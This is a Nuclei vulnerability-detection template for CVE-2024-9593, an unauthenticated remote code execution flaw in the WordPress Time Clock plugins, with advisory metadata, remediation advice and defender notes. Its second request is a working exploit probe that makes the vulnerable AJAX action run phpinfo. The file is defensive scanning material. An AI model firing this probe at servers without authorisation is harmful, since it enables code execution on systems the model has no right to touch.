nuclei-templates/http/cves/2024/CVE-2024-9593.yaml


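# Detection template for CVE-2024-9593 (WordPress Time Clock / Time Clock Pro).
#
# Layout: `info` holds the advisory metadata; `flow` chains two HTTP requests so
# the active probe is sent only to hosts whose front page references the plugin.
#
# NOTE(review): the trailing `# digest:` line is a signature over this file.
# Any edit (including comments) presumably invalidates it, so the template
# has to be re-signed before signature verification is relied on.
id: CVE-2024-9593

info:
  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
  # Derived from the affected-version ranges in the description above.
  remediation: |
    Update Time Clock to a release newer than 1.2.2 and Time Clock Pro to a release newer than 1.1.4, or deactivate the plugin until an update can be applied.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
    - https://github.com/RandomRobbieBF/CVE-2024-9593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2024-9593
    cwe-id: CWE-94
    epss-score: 0.00052
    epss-percentile: 0.21567
  metadata:
    max-request: 2
    verified: true
    vendor: scott_paterson
    product: time-clock & time-clock-pro
    framework: wordpress
    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro

# http(2) is evaluated only when http(1) matched.
flow: http(1) && http(2)

http:
  # Request 1: passive fingerprint. The substring also matches the
  # "time-clock-pro" plugin path, so one check covers both products.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/time-clock")'
          - 'status_code == 200'
        condition: and
        # internal: used only as the gate for `flow`, not reported as a finding.
        internal: true

  # Request 2: active probe. The blank line before the form body is required;
  # without it the body line is read as part of the header section.
  # Defender notes: the request asks the AJAX action to run phpinfo, so a
  # positive result carries the target's PHP configuration - treat scan output
  # as sensitive. In access logs, unauthenticated requests to admin-ajax.php
  # with action=etimeclockwp_load_function are the footprint to look for.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=phpinfo

    # Both matchers must hold: phpinfo markers in the body AND HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    # Reports the PHP version read from the phpinfo table (capture group 1).
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'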
# digest: 4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950